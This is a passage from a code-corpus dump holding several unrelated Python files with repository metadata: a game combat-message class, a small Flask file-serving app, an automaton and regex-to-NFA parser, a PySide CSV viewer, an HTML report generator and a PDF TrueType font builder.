        weapon_component = weapon_item.weapon
        if not weapon_component:
            return False
        return weapon_component.melee_damage_type in (DamageType.Pierce, DamageType.Slash)

    @classmethod
    def execute(cls, attack_result):
        """Perform the finisher; its only effect is the returned message."""
        return cls.get_message(attack_result)

    @classmethod
    def get_message(cls, attack_result):
        """Build the finisher message from the attacker's or an observer's
        perspective, with an optional blood-splash suffix."""
        context = attack_result.context
        attacker = context.attacker
        defender = context.defender
        weapon_item = context.attacker_weapon
        if attacker.is_player:
            message = cls.attacker_message.format(
                defender=defender.name,
                defender_bodypart=attack_result.body_part_hit.name,
                attacker_weapon=weapon_item.name,
            )
        else:
            message = cls.observer_message.format(
                attacker=functions.get_name_or_string(attacker),
                defender=functions.names_or_your(defender),
                defender_bodypart=attack_result.body_part_hit.name,
                attacker_his=functions.his_her_it(attacker),
                attacker_weapon=weapon_item.name,
            )
        if defender.body.blood:
            message += " splashing {blood} behind {defender_him}!!\n".format(
                blood=defender.body.blood.name,
                defender_him=functions.him_her_it(defender),
            )
        return message
| [
"arzhul@gmail.com"
] | arzhul@gmail.com |
c3e17d7f707e9ee568efd0dd01e59616bf2aa804 | 0b53c1ff4ac0f12db39da5661d26ffb0a387f909 | /web/ients_doc.py | 4bcb68489597806c7896cb10b6b93f47b9040383 | [] | no_license | summer93/ients-doc | 4ee3d812b3c007c28ab9c6cb72d87d10219ebc1b | e3b4215035c6cafcf81eafeb9510c8d5612090b6 | refs/heads/master | 2020-04-04T09:37:33.072383 | 2018-11-02T09:00:31 | 2018-11-02T09:00:31 | 155,825,205 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | from flask import Flask, make_response, send_file,request
from werkzeug.utils import secure_filename
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
    """Root endpoint: static greeting, usable as a liveness check."""
    return 'Hello World!'
# Gate flag read by upload_file: when False every request is rejected.
arg = True
@app.route('/static/<filename>')
def upload_file(filename):
    """Serve a protected file via nginx's X-Accel-Redirect internal redirect.

    *filename* comes straight from the URL, so it is sanitised with
    werkzeug's ``secure_filename`` (already imported in this module) before
    being placed in the redirect header — otherwise a crafted name could
    traverse outside /data (path traversal).
    """
    if arg:
        safe_name = secure_filename(filename)
        response = make_response()
        response.headers['X-Accel-Redirect'] = '/data/{}'.format(safe_name)
        return response
    else:
        return 'no!no!no!'
if __name__ == '__main__':
    # Development server only; use a proper WSGI server in production.
    app.run(debug=True)
| [
"root@centos-linux-summer.shared"
] | root@centos-linux-summer.shared |
ab4ff441c01cd8cee45358629d43934c66624e27 | c34198adb832f1338c9dbd99d7620c03246cd367 | /classes/Parser.py | a546fcc9cb0cc245a0c798deaecd2b8950cc5b33 | [] | no_license | frostyhue/Finite_State_Automata | 7b63fe04c3be46b642c427ecc2cae049677e3ea9 | cd039d16e2a85b010774b46e282c8e015d9cfcb1 | refs/heads/master | 2020-04-07T08:59:06.368810 | 2019-01-29T23:45:53 | 2019-01-29T23:45:53 | 158,235,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,934 | py | from classes.Lexer import *
from classes.Transition import *
from classes.State import *
from classes.Operations import *
###############################################################################
# #
# PARSER #
# #
###############################################################################
class Parser(object):
def __init__(self, lexer):
self.current_token = ''
self.tokens_list = []
self.lexer = lexer
self.states = []
self.transitions = []
self.alphabet = []
self.initial_state = ''
self._state_number = 0
self.states = []
self.transitions = []
# Method that raises and error.
def error(self, type_got):
raise Exception('Token type {type} expected, received {type_got}!'.format(type=self.current_token.type, type_got=type_got))
    # Method that goes to the next token if the current one has already been processed.
    def pop_token(self, token_type):
        """Consume the current token if it matches *token_type*, else raise.

        At the end of the expression the current token is left in place
        (the lexer is not advanced past the last token).
        """
        if self.current_token.type == token_type:
            if not self.lexer.expr_end():
                self.current_token = self.lexer.token_next()
        else:
            self.error(token_type)
def find_state_change_final(self, state_name):
for state in self.states:
if state.state_name == state_name:
state.final = True
    def process_statement(self):
        """Process one declaration line of an automaton description.

        Handles the reserved headers 'alphabet:', 'states:', 'final:' and
        'transitions:' (the latter consumes 'X, a --> Y' entries until
        'end.'); any other token type is reported and ignored.
        """
        token = self.current_token
        if token.type == RESERVED:
            if token.value == 'alphabet:':
                # Collect lowercase letters into the alphabet.
                self.pop_token(RESERVED)
                while self.current_token.type == LETTER_SMALL:
                    self.alphabet.append(self.current_token)
                    if self.lexer.expr_end():
                        break
                    self.pop_token(LETTER_SMALL)
            elif token.value == 'states:':
                # Comma-separated capital letters become State objects.
                self.pop_token(RESERVED)
                while self.current_token.type == LETTER_CAPITAL:
                    self.states.append(State(name=self.current_token.value))
                    if self.lexer.expr_end():
                        break
                    self.pop_token(LETTER_CAPITAL)
                    if self.current_token.type == COMMA:
                        self.pop_token(COMMA)
            elif token.value == 'final:':
                # Mark the listed states as final.
                self.pop_token(RESERVED)
                while self.current_token.type == LETTER_CAPITAL:
                    self.find_state_change_final(self.current_token.value)
                    if self.lexer.expr_end():
                        break
                    self.pop_token(LETTER_CAPITAL)
                    if self.current_token.type == COMMA:
                        self.pop_token(COMMA)
            elif token.value == 'transitions:':
                self.pop_token(RESERVED)
                while not self.current_token.value == 'end.':
                    origin = self.current_token.value
                    # The first transition's origin becomes the initial state
                    # (initial_state is still a str only before it is set).
                    if type(self.initial_state) == str:
                        for state in self.states:
                            if state.state_name == origin:
                                self.initial_state = state
                    self.pop_token(LETTER_CAPITAL)
                    self.pop_token(COMMA)
                    edge = self.current_token.value
                    if self.current_token.type == LETTER_SMALL:
                        self.pop_token(LETTER_SMALL)
                    else:
                        self.pop_token(UNDERSCORE)
                    # Arrow syntax: '-', '-', '>'.
                    self.pop_token(DASH)
                    self.pop_token(DASH)
                    self.pop_token(ANGLE_BRACKET)
                    destination = self.current_token.value
                    self.pop_token(LETTER_CAPITAL)
                    self.transitions.append(Transition(origin=origin, edge=edge, destination=destination))
                    if self.lexer.expr_end():
                        break
                    self.pop_token(RESERVED)
        else:
            print('Unexpected type!')
    def process_regex(self):
        """Recursively build an AST node for the regex expression starting at
        the current token (letters, '*', '_', '.', '|', parentheses)."""
        token = self.current_token
        node = ""
        if token.type == LETTER_SMALL:
            # probably for assigning an alphabet letter!
            # self.pred_list.append(token.value)
            node = Letter(self.current_token)
            self.pop_token(LETTER_SMALL)
            if self.current_token.type == COMMA:
                self.pop_token(COMMA)
            if self.current_token.type == RPAR:
                self.pop_token(RPAR)
            return node
        # Logic if the current token is a start for repeating the letter.
        elif token.type == STAR:
            op = Token(type=STAR, value='*')
            self.pop_token(STAR)
            if self.current_token.type == LPAR:
                self.pop_token(LPAR)
            node = Repeat(op=op, letter=self.process_regex())
            return node
        elif token.type == UNDERSCORE:
            # Logic if the current token is a start for repeating the letter.
            op = Token(type=UNDERSCORE, value=u'\u03B5')
            self.pop_token(UNDERSCORE)
            if self.current_token.type == LPAR:
                self.pop_token(LPAR)
            node = ET(symbol=op)
            return node
        # Logic if the current token is one of the Contingency operators.
        elif token.type in (DOT, PIPE):
            if token.type == DOT:
                op = Token(type=DOT, value='.')
            elif token.type == PIPE:
                op = Token(type=PIPE, value='|')
            self.pop_token(token.type)
            self.pop_token(LPAR)
            node = TransitionOp(left=self.process_regex(), op=op, right=self.process_regex())
            return node
        # Logic if the current token is a right parentheses.
        elif token.type == RPAR:
            self.pop_token(RPAR)
            node = self.process_regex()
            return node
        # Logic if the current token is a comma.
        elif token.type == COMMA:
            self.pop_token(COMMA)
            node = self.process_regex()
            return node
        return node
    def regex_nfa(self, _expression):
        """Tokenize *_expression* and build its NFA.

        Sets ``self.initial_state`` to the NFA's entry state and returns the
        accumulated ``(states, transitions)`` lists.
        """
        self.new_expression(_expression)
        self.initial_state = self.parse_nfa()[0]
        return self.states, self.transitions
    def parse_nfa(self):
        """Recursively translate the prefix regex token stream into NFA
        fragments (fresh 'S<n>' states plus Transition edges appended to
        ``self.states`` / ``self.transitions``).

        Returns a pair: for a letter, ``(state, letter)``; for an operator,
        ``(entry_state, exit_state)`` of the built fragment. '_' edges are
        epsilon transitions.
        """
        token = self.current_token
        # the base condition where the next token is a letter or underscore
        if token.type in (LETTER_SMALL, UNDERSCORE):
            state = State('S' + str(self._state_number))
            self._state_number += 1
            letter = self.current_token.value
            self.pop_token(LETTER_SMALL)
            if self.current_token.type == COMMA:
                self.pop_token(COMMA)
            if self.current_token.type == RPAR:
                self.pop_token(RPAR)
            return state, letter
        # if the current operation is from a to b aka Dot
        elif token.type == DOT:
            self.pop_token(DOT)
            self.pop_token(LPAR)
            # if first param is a letter
            if self.current_token.type in (LETTER_SMALL, STAR):
                not_star = False
                if not self.current_token.type == STAR:
                    not_star = True
                _origin, _edge_o = self.parse_nfa()
                if not_star:
                    self.states.append(_origin)
                # if second param is a letter
                if self.current_token.type in (LETTER_SMALL, STAR):
                    _dest, _edge_d = self.parse_nfa()
                    if not self.current_token.type == STAR:
                        self.states.append(_dest)
                    _end_state = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_end_state)
                    self.transitions.append(Transition(_origin.state_name, _edge_o, _dest.state_name))
                    self.transitions.append(Transition(_dest.state_name, _edge_d, _end_state.state_name))
                    return _origin, _end_state
                # if second param is an operation
                else:
                    # self.pop_token(COMMA)
                    _dest, _end_state = self.parse_nfa()
                    self.transitions.append(Transition(_origin.state_name, _edge_o, _dest.state_name))
                    return _origin, _end_state
            # if first param is an operation
            else:
                _origin, _state_mid= self.parse_nfa()
                self.pop_token(COMMA)
                # if second param is a letter
                if self.current_token.type in (LETTER_SMALL, STAR):
                    not_star = False
                    if not self.current_token.type == STAR:
                        not_star = True
                    _dest, _edge_d = self.parse_nfa()
                    if not_star:
                        self.states.append(_dest)
                    self.transitions.append(Transition(_state_mid.state_name, _edge_d, _dest.state_name))
                    return _origin, _dest
                # if second param i sn operation
                else:
                    _dest, _end_state = self.parse_nfa()
                    self.transitions.append(Transition(_state_mid.state_name, '_', _dest.state_name))
                    return _origin, _end_state
        # If the current operation is repeat aka STAR
        elif token.type == STAR:
            self.pop_token(STAR)
            self.pop_token(LPAR)
            """If the next token is a letter, meaning it will be looping only a letter"""
            _origin, _edge_o = self.parse_nfa()
            self.states.append(_origin)
            # Self-loop implements the Kleene repetition.
            self.transitions.append(Transition(_origin.state_name, _edge_o, _origin.state_name))
            if self.current_token.type == COMMA:
                self.pop_token(COMMA)
            return _origin, '_'
        # it the operation is an or aka PIPE
        elif token.type == PIPE:
            self.pop_token(PIPE)
            self.pop_token(LPAR)
            # if the next token is a letter
            if self.current_token.type in (LETTER_SMALL, STAR):
                not_star = False
                if not self.current_token.type == STAR:
                    not_star = True
                _origin, _edge_o = self.parse_nfa()
                if not_star:
                    self.states.append(_origin)
                _end_o = State('S' + str(self._state_number))
                self._state_number += 1
                self.states.append(_end_o)
                self.transitions.append(Transition(_origin.state_name, _edge_o, _end_o.state_name))
                # if the next token is a letter
                if self.current_token.type in (LETTER_SMALL, STAR):
                    _dest, _edge_d = self.parse_nfa()
                    self.transitions.append(Transition(_origin.state_name, _edge_d, _end_o.state_name))
                    return _origin, _end_o
                # if second param is an operation
                else:
                    _dest, _end_d = self.parse_nfa()
                    _start = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_start)
                    _end_state = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_end_state)
                    self.transitions.append(Transition(_start.state_name, '_', _origin.state_name))
                    self.transitions.append(Transition(_start.state_name, '_', _dest.state_name))
                    self.transitions.append(Transition(_end_o.state_name, '_', _end_state.state_name))
                    self.transitions.append(Transition(_end_d.state_name, '_', _end_state.state_name))
                    return _start, _end_state
            else:
                _left_o, _left_d = self.parse_nfa()
                self.pop_token(COMMA)
                # if the next token is a letter
                if self.current_token.type in (LETTER_SMALL, STAR):
                    not_star = False
                    if not self.current_token.type == STAR:
                        not_star = True
                    _right_o, _right_l = self.parse_nfa()
                    if not_star:
                        self.states.append(_right_o)
                    _right_d = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_right_d)
                    self.transitions.append(Transition(_right_o.state_name, _right_l, _right_d.state_name))
                    _start = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_start)
                    _end_state = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_end_state)
                    self.transitions.append(Transition(_start.state_name, '_', _left_o.state_name))
                    self.transitions.append(Transition(_start.state_name, '_', _right_o.state_name))
                    self.transitions.append(Transition(_left_d.state_name, '_', _end_state.state_name))
                    self.transitions.append(Transition(_right_d.state_name, '_',_end_state.state_name))
                    return _start, _end_state
                # if second param is an operation
                else:
                    _right_o, _right_d = self.parse_nfa()
                    _start = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_start)
                    _end_state = State('S' + str(self._state_number))
                    self._state_number += 1
                    self.states.append(_end_state)
                    self.transitions.append(Transition(_start.state_name, '_', _left_o.state_name))
                    self.transitions.append(Transition(_start.state_name, '_', _right_o.state_name))
                    self.transitions.append(Transition(_left_d.state_name, '_', _end_state.state_name))
                    self.transitions.append(Transition(_right_d.state_name, '_', _end_state.state_name))
                    return _start, _end_state
        return self.states, self.transitions
def new_expression(self, _expression):
self.tokens_list = self.lexer.lex(_expression)
self.current_token = self.tokens_list[0]
def parse_file(self, list):
for item in list:
self.new_expression(str(item))
self.process_statement()
def parse_regex(self):
node = self.process_regex()
return node
| [
"I358097@fhict.nl"
] | I358097@fhict.nl |
31b625777e18824c02b07eb5c412b663cb49c233 | 2463fe693f203ba0b200da5a141bd34fa1a22677 | /src/cs.py | e24e7225068aae623f9a71ef365292a29dd3a8c6 | [] | no_license | spolydor/QT-CSV | 4a5b61b66be9e7a4a1944c23eb5dc35bfac9cff1 | 74bb48a29bf78fe159742f141a0ff2376237ab3b | refs/heads/master | 2020-04-12T23:05:28.624509 | 2016-02-09T13:50:13 | 2016-02-09T13:50:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | import sys
from PySide.QtGui import QApplication, QWidget
from src import gui
import csv
class cs(QWidget):
    """Small Qt widget that loads 'tcs.csv' on a button click and shows its
    contents in the generated form's text box."""
    def __init__(self, parent=None):
        super().__init__(parent)
        self.myForm = gui.Ui_Form()
        self.myForm.setupUi(self)
        self.myForm.el.clicked.connect(self.buttonHit) # connect the button to its handler method
    def read(self):
        with open('tcs.csv', newline='') as csvfile: # open the csv file
            txt = ""
            spamreader = csv.reader(csvfile, delimiter=';', quotechar='|') # parse the csv file
            for row in spamreader: # walk through every row
                txt += str(', '.join(row)) + "\n" # join the columns of the row
            self.myForm.tb.setText(txt) # display the parsed csv contents in the GUI
    def buttonHit(self):
        self.read() # run the read method on click
if __name__ == "__main__":
app = QApplication(sys.argv)
c = cs()
c.show()
sys.exit(app.exec_()) | [
"spolydor@student.tgm.ac.at"
] | spolydor@student.tgm.ac.at |
3b10edd48459c6f5a59818de9043123639b629ff | ae71584162ad4e0e204948dda2d105a234949306 | /pagemaker.py | fafa218384bca13afc6eec7bcf47b2e255f24b49 | [
"Apache-2.0"
] | permissive | hjwp/fast-cluster-analysis | 8701579066d1bd4bb5b165ed4f875f33518fe11f | 91691b5ed4e2f36746b95cdb3a215afe762929a5 | refs/heads/master | 2021-01-21T05:59:07.499175 | 2013-12-04T09:40:31 | 2013-12-04T09:40:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | #!/usr/bin/env python
import glob
def make_page(path, datapath):
    """Write an 'index.html' cluster-analysis summary page.

    :param path: directory in which 'index.html' is created.
    :param datapath: directory scanned for '*.txt' data frames.

    Output is byte-identical to the previous write-per-line version, but the
    file is now opened with 'with' (closed even on error) and the four
    identical figure tables are generated from a data list.
    """
    num_frames = len(glob.glob(datapath + "/*.txt"))
    # Caption/image pairs for the cluster-property figures.
    figures = [
        ("Fig. 1: Hits per cluster.", "hpc.png"),
        ("Fig. 2: Counts per cluster.", "cpc.png"),
        ("Fig. 3: Cluster radius (unweighted).", "cru.png"),
        ("Fig. 4: Cluster density (unweighted).", "cdu.png"),
    ]
    parts = [
        "<!DOCTYPE html>\n",
        "<html>\n",
        "  <head>\n",
        "    <link rel=\"stylesheet\" type=\"text/css\" ",
        "href=\"assets/css/style.css\">\n",
        "  </head>\n",
        "  <body>\n",
        "    <a href='http://cernatschool.web.cern.ch'><img class='logo' src='assets/images/rect_web_large.png' /></a>\n",
        "    <h1>Basic Cluster Analysis</h1>\n",
        "    <h2>Dataset summary</h2>\n",
        "    <p>\n",
        "      <ul>\n",
        "        <li>Dataset path = '%s'</li>\n" % datapath,
        "        <li>Number of frames = %d</li>\n" % num_frames,
        "      </ul>\n",
        "    </p>\n",
        "    <h2>Cluster properties</h2>\n",
    ]
    for caption, image in figures:
        parts.append("    <table>\n")
        parts.append("      <caption>%s</caption>\n" % caption)
        parts.append("      <tr><td><img src=\"%s\" /></td></tr>\n" % image)
        parts.append("    </table>\n")
    parts.append("  </body>\n")
    parts.append("</html>")
    homepagename = path + "/index.html"
    with open(homepagename, "w") as f:
        f.write("".join(parts))
| [
"Tom Whyntie"
] | Tom Whyntie |
145ae6eef5a9c9e0b2b158275aa8d8b2b504fd31 | 58df224689ab08c99359b1a6077d2fba3728dc61 | /lamda-ocr/merge-files/borb/pdf/canvas/font/simple_font/true_type_font.py | c0b6112c2b259f0d2c80c3ef2231a518f87ed377 | [] | no_license | LIT-Midas/LITHackathon | 2b286728c156d79d3f426f6d19b160a2a04690db | 7b990483dd48b91cf3ec3452b78ab67770da71af | refs/heads/main | 2023-08-13T05:22:59.373965 | 2021-08-16T01:09:49 | 2021-08-16T01:09:49 | 395,024,729 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,861 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The TrueType font format was developed by Apple Computer, Inc., and has been adopted as a standard font
format for the Microsoft Windows operating system. Specifications for the TrueType font file format are
available in Apple’s TrueType Reference Manual and Microsoft’s TrueType 1.0 Font Files Technical
Specification (see Bibliography).
"""
import typing
import zlib
from decimal import Decimal
from pathlib import Path
from borb.io.read.types import Decimal as pDecimal
from borb.io.read.types import Dictionary, List, Name, Stream, String
from borb.pdf.canvas.font.composite_font.cid_font_type_2 import CIDType2Font
from borb.pdf.canvas.font.composite_font.font_type_0 import Type0Font
from borb.pdf.canvas.font.simple_font.font_type_1 import Type1Font
from fontTools.agl import toUnicode # type: ignore [import]
from fontTools.pens.boundsPen import BoundsPen # type: ignore [import]
from fontTools.ttLib import TTFont # type: ignore [import]
class TrueTypeFont(Type1Font):
"""
A TrueType font dictionary may contain the same entries as a Type 1 font dictionary (see Table 111), with these
differences:
• The value of Subtype shall be TrueType.
• The value of Encoding is subject to limitations that are described in 9.6.6, "Character Encoding".
• The value of BaseFont is derived differently. The PostScript name for the value of BaseFont may be determined in one of two ways:
• If the TrueType font program's “name” table contains a PostScript name, it shall be used.
• In the absence of such an entry in the “name” table, a PostScript name shall be derived from the name by
which the font is known in the host operating system. On a Windows system, the name shall be based on
the lfFaceName field in a LOGFONT structure; in the Mac OS, it shall be based on the name of the FOND
resource. If the name contains any SPACEs, the SPACEs shall be removed.
"""
    @staticmethod
    def true_type_font_from_file(
        path_to_font_file: Path,
    ) -> typing.Union["TrueTypeFont", "Type0Font"]:
        """
        This function returns the PDF TrueTypeFont object for a given TTF file.
        Fonts whose cmap maps 256 or more glyphs are returned as a Type0Font
        (composite font) instead; in both cases the raw TTF bytes are embedded
        as a FontFile2 stream.
        """
        assert path_to_font_file.exists()
        assert path_to_font_file.name.endswith(".ttf")
        font_file_bytes: typing.Optional[bytes] = None
        with open(path_to_font_file, "rb") as ffh:
            font_file_bytes = ffh.read()
        assert font_file_bytes
        # read file
        ttf_font_file: TTFont = TTFont(path_to_font_file)
        # read cmap
        cmap: typing.Optional[typing.Dict[int, str]] = ttf_font_file.getBestCmap()
        assert cmap is not None
        # Invert the cmap; when several codes map to one glyph, keep the
        # smallest code.
        cmap_reverse: typing.Dict[str, int] = {}
        for k, v in cmap.items():
            if v in cmap_reverse:
                cmap_reverse[v] = min(cmap_reverse[v], k)
            else:
                cmap_reverse[v] = k
        glyph_order: typing.List[str] = [
            x for x in ttf_font_file.glyphOrder if x in cmap_reverse
        ]
        # if there are more than 256 glyphs, we need to switch to a Type0Font
        if len(glyph_order) >= 256:
            # fmt: off
            type_0_font: Type0Font = TrueTypeFont._type_0_font_from_file(ttf_font_file)
            type_0_font["DescendantFonts"][0]["FontDescriptor"][Name("FontFile2")] = TrueTypeFont._get_font_file_stream(font_file_bytes)
            return type_0_font
            # fmt: on
        # build font
        font: TrueTypeFont = TrueTypeFont()
        font_name: str = TrueTypeFont._get_base_font(ttf_font_file)
        font[Name("Name")] = Name(font_name)
        font[Name("BaseFont")] = Name(font_name)
        # build widths (scaled from font units to the 1000-unit glyph space)
        units_per_em: pDecimal = pDecimal(ttf_font_file["head"].unitsPerEm)
        if cmap is not None:
            font[Name("FirstChar")] = pDecimal(0)
            font[Name("LastChar")] = pDecimal(len(glyph_order))
            font[Name("Widths")] = List()
            for glyph_name in glyph_order:
                w: typing.Union[pDecimal, Decimal] = (
                    pDecimal(ttf_font_file.getGlyphSet()[glyph_name].width)
                    / units_per_em
                ) * Decimal(1000)
                w = pDecimal(round(w, 2))
                font["Widths"].append(w)
        assert font[Name("FirstChar")] >= 0
        assert (
            font[Name("LastChar")] < 256
        ), "TrueType fonts with more than 256 glyphs are currently not supported."
        font[Name("FontDescriptor")] = TrueTypeFont._get_font_descriptor(ttf_font_file)
        # Map character codes 0..N to glyph names via encoding Differences.
        font[Name("Encoding")] = Dictionary()
        font["Encoding"][Name("BaseEncoding")] = Name("WinAnsiEncoding")
        font["Encoding"][Name("Differences")] = List()
        for i in range(0, len(glyph_order)):
            font["Encoding"]["Differences"].append(pDecimal(i))
            font["Encoding"]["Differences"].append(Name(glyph_order[i]))
        # embed font file
        font["FontDescriptor"][Name("FontFile2")] = TrueTypeFont._get_font_file_stream(
            font_file_bytes
        )
        # return
        return font
@staticmethod
def _get_font_file_stream(font_file_bytes: bytes) -> Stream:
font_stream: Stream = Stream()
font_stream[Name("Type")] = Name("Font")
font_stream[Name("Subtype")] = Name("TrueType")
font_stream[Name("Length")] = pDecimal(len(font_file_bytes))
font_stream[Name("Length1")] = pDecimal(len(font_file_bytes))
font_stream[Name("Filter")] = Name("FlateDecode")
font_stream[Name("DecodedBytes")] = font_file_bytes
font_stream[Name("Bytes")] = zlib.compress(font_file_bytes, 9)
return font_stream
    @staticmethod
    def _get_font_descriptor(ttf_font_file: TTFont) -> Dictionary:
        """Build the PDF FontDescriptor dictionary for *ttf_font_file*:
        name, bounding box (from per-glyph bounds), CapHeight (from the
        first capital with bounds), ascent/descent and fixed TODO values."""
        # fmt: off
        font_descriptor: Dictionary = Dictionary()
        font_descriptor[Name("Type")] = Name("FontDescriptor")
        font_descriptor[Name("FontName")] = String(TrueTypeFont._get_base_font(ttf_font_file))
        font_descriptor[Name("FontStretch")] = Name("Normal")  # TODO
        font_descriptor[Name("FontWeight")] = pDecimal(400)  # TODO
        font_descriptor[Name("Flags")] = pDecimal(4)  # TODO
        # fmt: on
        # determine FontBBox, CapHeight
        units_per_em: float = ttf_font_file["head"].unitsPerEm
        min_x: float = 1000
        min_y: float = 1000
        max_x: float = 0
        max_y: float = 0
        cap_height: typing.Optional[pDecimal] = None
        glyph_set = ttf_font_file.getGlyphSet()
        for glyph_name in ttf_font_file.glyphOrder:
            pen = BoundsPen(glyph_set)
            glyph_set[glyph_name].draw(pen)
            if pen.bounds is None:
                continue
            # determine CapHeight
            if glyph_name in "EFHIJLMNTZ" and cap_height is None:
                cap_height = pDecimal(pen.bounds[3])
            # Scale glyph bounds from font units to 1000-unit glyph space.
            min_x = min(min_x, pen.bounds[0] / units_per_em * 1000)
            min_y = min(min_y, pen.bounds[1] / units_per_em * 1000)
            max_x = max(max_x, pen.bounds[2] / units_per_em * 1000)
            max_y = max(max_y, pen.bounds[3] / units_per_em * 1000)
        if cap_height is None:
            # Fallback when no capital letter had drawable bounds.
            cap_height = pDecimal(840)
        font_descriptor[Name("FontBBox")] = List().set_can_be_referenced(False)  # type: ignore[attr-defined]
        font_descriptor["FontBBox"].append(pDecimal(min_x))
        font_descriptor["FontBBox"].append(pDecimal(min_y))
        font_descriptor["FontBBox"].append(pDecimal(max_x))
        font_descriptor["FontBBox"].append(pDecimal(max_y))
        # fmt: off
        font_descriptor[Name("ItalicAngle")] = pDecimal(ttf_font_file["post"].italicAngle)
        font_descriptor[Name("Ascent")] = pDecimal(ttf_font_file["hhea"].ascent / units_per_em * 1000)
        font_descriptor[Name("Descent")] = pDecimal(ttf_font_file["hhea"].descent / units_per_em * 1000)
        font_descriptor[Name("CapHeight")] = cap_height
        font_descriptor[Name("StemV")] = pDecimal(297)  # TODO
        # fmt: on
        return font_descriptor
@staticmethod
def _get_base_font(ttf_font_file: TTFont) -> str:
font_name: str = str(
[
x
for x in ttf_font_file["name"].names
if x.platformID == 3 and x.platEncID == 1 and x.nameID == 6
][0].string,
"latin1",
)
font_name = "".join(
[x for x in font_name if x.lower() in "abcdefghijklmnopqrstuvwxyz-"]
)
return font_name
    @staticmethod
    def _build_custom_cmap(ttf_font_file: TTFont) -> Stream:
        """Build a ToUnicode CMap stream mapping glyph indices (as 4-hex-digit
        CIDs) to their Unicode values, in bfchar groups of at most 100."""
        cmap_prefix: str = """
    /CIDInit /ProcSet findresource begin
    12 dict begin
    begincmap
    /CIDSystemInfo
    << /Registry (Adobe)
    /Ordering (UCS)
    /Supplement 0
    >> def
    /CMapName /Adobe-Identity-UCS def
    /CMapType 2 def
    1 begincodespacerange
    <0000> <FFFF>
    endcodespacerange
    """
        # 1 beginbfchar
        # <0000> <0000>
        # endbfchar
        pairs: typing.List[typing.Tuple[str, str]] = []
        for i, g in enumerate(ttf_font_file.glyphOrder):
            g_unicode: str = toUnicode(g)
            if len(g_unicode) == 0:
                continue
            g_hex: str = ""
            if len(g_unicode) == 1:
                g_hex = hex(ord(g_unicode))[2:]
            if len(g_unicode) == 2:
                g_hex = hex(ord(g_unicode[0]))[2:] + hex(ord(g_unicode[1]))[2:]
            # Zero-pad both glyph index and unicode value to 4 hex digits.
            while len(g_hex) < 4:
                g_hex = "0" + g_hex
            i_hex: str = hex(i)[2:]
            while len(i_hex) < 4:
                i_hex = "0" + i_hex
            pairs.append((i_hex, g_hex))
        cmap_content: str = ""
        for i in range(0, len(pairs), 100):
            start_index: int = i
            end_index: int = min(start_index + 100, len(pairs))
            n: int = end_index - start_index
            cmap_content += "%d beginbfchar\n" % n
            for j in range(start_index, end_index):
                cmap_content += "<%s> <%s>\n" % (pairs[j][0], pairs[j][1])
            cmap_content += "endbfchar\n"
        cmap_suffix: str = """
    endcmap
    CMapName currentdict /CMap defineresource pop
    end
    end
    """
        bts: bytes = (cmap_prefix + cmap_content + cmap_suffix).encode("latin1")
        to_unicode_stream = Stream()
        to_unicode_stream[Name("DecodedBytes")] = bts
        to_unicode_stream[Name("Bytes")] = zlib.compress(bts, 9)
        to_unicode_stream[Name("Filter")] = Name("FlateDecode")
        to_unicode_stream[Name("Length")] = pDecimal(len(bts))
        return to_unicode_stream
    @staticmethod
    def _type_0_font_from_file(ttf_font_file: TTFont) -> "Type0Font":
        """Build a composite (Type0) PDF font from a parsed TrueType file.

        Assembles the Type0 dictionary (BaseFont, Identity-H encoding,
        ToUnicode CMap) and its single CIDFontType2 descendant with
        descriptor, per-CID width array and CIDSystemInfo.
        """
        type_0_font: Type0Font = Type0Font()
        # build BaseFont
        font_name: str = TrueTypeFont._get_base_font(ttf_font_file)
        type_0_font[Name("BaseFont")] = Name(font_name)
        # set Encoding
        type_0_font[Name("Encoding")] = Name("Identity-H")
        # set ToUnicode
        type_0_font[Name("ToUnicode")] = TrueTypeFont._build_custom_cmap(ttf_font_file)
        # build DescendantFont
        descendant_font: CIDType2Font = CIDType2Font()
        descendant_font[Name("Type")] = Name("Font")
        descendant_font[Name("Subtype")] = Name("CIDFontType2")
        descendant_font[Name("BaseFont")] = Name(font_name)
        descendant_font[Name("FontDescriptor")] = TrueTypeFont._get_font_descriptor(
            ttf_font_file
        )
        # Default width for CIDs not listed in W; may be overwritten below
        # with the width of the space glyph.
        descendant_font[Name("DW")] = pDecimal(250)
        # build W array
        cmap = ttf_font_file["cmap"].getcmap(3, 1).cmap
        glyph_set = ttf_font_file.getGlyphSet()
        widths_array: List = List()
        for cid, g in enumerate(ttf_font_file.glyphOrder):
            glyph_width: float = 0
            try:
                glyph_width = glyph_set[cmap[ord(toUnicode(g))]].width
            except:
                # Glyph has no unicode value / cmap entry — fall back to width 0.
                glyph_width = pDecimal(0)
            # set DW based on the width of a space character
            if toUnicode(g) == " ":
                descendant_font[Name("DW")] = pDecimal(glyph_width)
            # W array format: cid [width] — one singleton list per CID.
            widths_array.append(pDecimal(cid))
            widths_array.append(List())
            widths_array[-1].append(pDecimal(glyph_width))
        descendant_font[Name("W")] = widths_array
        descendant_font[Name("CIDToGIDMap")] = Name("Identity")
        # build CIDSystemInfo
        # fmt: off
        descendant_font[Name("CIDSystemInfo")] = Dictionary()
        descendant_font[Name("CIDSystemInfo")][Name("Registry")] = String("Adobe")
        descendant_font[Name("CIDSystemInfo")][Name("Ordering")] = String("Identity")
        descendant_font[Name("CIDSystemInfo")][Name("Supplement")] = pDecimal(0)
        # fmt: on
        # add to DescendantFonts
        type_0_font[Name("DescendantFonts")] = List()
        type_0_font[Name("DescendantFonts")].append(descendant_font)
        # return
        return type_0_font
    def __init__(self):
        """Initialize the font dictionary and mark it as a TrueType font."""
        super(TrueTypeFont, self).__init__()
        self[Name("Subtype")] = Name("TrueType")
    def _empty_copy(self) -> "Font":  # type: ignore [name-defined]
